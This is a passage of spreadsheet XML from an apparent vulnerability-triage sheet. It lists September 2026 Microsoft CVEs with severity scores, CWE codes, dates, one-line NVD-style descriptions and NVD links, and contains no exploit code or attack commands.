        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68894</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69271</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69301</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69322</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69332</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K37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75" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69346</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69365</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S377" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69371</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69412</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K379" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69418</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69418</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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81" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69427</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69458</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69462</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69481</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K386"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86" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69505</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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87" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
